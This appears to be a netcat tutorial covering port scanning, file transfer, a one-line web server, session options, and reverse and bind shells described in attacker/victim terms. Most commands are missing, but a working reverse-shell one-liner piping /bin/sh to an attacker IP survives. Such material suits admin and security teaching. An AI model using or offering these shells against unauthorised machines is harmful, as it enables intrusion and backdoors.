A brief difference between netcat-traditional and netcat-openbsd
There are two similar packages available for netcat with a slight difference between them.
netcat-traditional includes an additional ‘-e’ option which can be used for binding a program (i.e bash) with netcat. This feature is very useful for remote administration purposes.
netcat-openbsd have some additional support for IPv6 and proxies.
Netcat Installation
Though netcat comes pre-installed in most Linux distributions but if its not, it can be installed easily using the following commands.
For traditional package,
For openbsd version,
Netcat for Windows can be downloaded from here https://sourceforge.net/projects/nc110/files/.
Now we’ll explore some interesting use cases of netcat
Port Scanning using netcat
To scan for open ports, use ‘-z’ option. Netcat will try to connect to every port without sending any data or very limited data in UDP case. Type the following
…snip…
hackme.org [217.78.1.155] 80 (http) open
To scan for a range of ports, type
(UNKNOWN) [192.168.100.72] 80 (http) open
(UNKNOWN) [192.168.100.72] 22 (ssh) open
File Transfer with netcat
Another useful use case of netcat is file transfer between remote computers. You can send texts and binary files from one PC to another PC. We’ll try to send a file “file.pdf” from Linux PC to Windows PC [IP 192.168.100.72] using netcat as an example.
On Windows machine (receiver), type the following
Listening on [0.0.0.0] (family 2, port 1337)
On Linux machine (sender), type the following
Connection to 192.168.100.72 1337 port [tcp/*] succeeded!
Remote Administration with netcat
One of the best use cases of netcat is remote administration, that means you can control someone else’s PC using netcat. Netcat-traditional comes with ‘-e’ option which can be used to bind a program (i.e cmd.exe in Windows or bash in Linux) with a port, that means netcat will act as communicator between the program and the remote PC. Netcat will receive commands from remote PC, execute on local system and will send the results back to the remote PC. This feature is widely used for malicious purposes, to keep backdoors in PCs and servers. This feature is only available in netcat-traditional but with a little trick, netcat-openbsd can also be used for the same purpose. You can use two ways to control others’ PC.
In a Reverse Shell connection, an attacker listens on a port and waits for a connection to be sent from the victim machine. It is used when victim computer is behind NAT or doesn’t have public IP.
To get a reverse shell using netcat, you need to listen on a port using netcat. Type the following on the attacker machine,
Listening on [0.0.0.0] (family 2, port 1337)
On victim machine (if netcat-traditional is installed)
//replace “/bin/bash” with “cmd.exe” in case of Windows
For netcat-openbsd (where “-e” option isn’t supported)
/tmp/f|/bin/sh -i 2>&1|nc [IP_ADDR] 1337 >/tmp/f
While in a Bind Shell connection, attacker binds a port on the victim machine and connects to that port using client socket. It is used when attacker’s machine is behind NAT or doesn’t have a public IP.
On victim machine, type
listening on [any] 1337 …
Now, to run commands on the victim machine, type
Connection to 127.0.0.1 1337 port [tcp/*] succeeded!
$ id
uid=1000(azad) gid=1000(azad) groups=1000(azad),4(adm),24(cdrom),27(sudo),
30(dip),46(plugdev),118(lpadmin),129(sambashare)
Simple Web Server using netcat
You can also do another simple trick to use netcat as minimal single page web server. This web server would be very simple with no special configurations, and we’ll use to it send our HTML code to the browser.
My Simple Webserver using netcat</h1>")" | nc -nvlp 1337 ; done
Listening on [0.0.0.0] (family 2, port 1337)
Now, try to fetch the webpage using curl
<h1>My Simple Webserver using netcat</h1>
Specify Timeout for a netcat Session
You can specify timeout for a netcat session using “-w” option. Netcat will automatically disconnect its session after the specified time passes out.
ubuntu@ubuntu:~$ nc -w 40 -nvlp 1337
Listening on [0.0.0.0] (family 2, port 1234)
Continue Listening even if Client closes the Connection
In normal mode, netcat server shuts down and stop listening on the port when a client closes the connection. You can keep the server up using “-k” option
Listening on [0.0.0.0] (family 2, port 1234)
Conclusion
Netcat is simple yet efficient utility which can be used for a lot of simple daily tasks. It comes pre-installed in almost every UNIX like operating systems and can be used for various tasks like communication between two PCs, file transfer and many more.
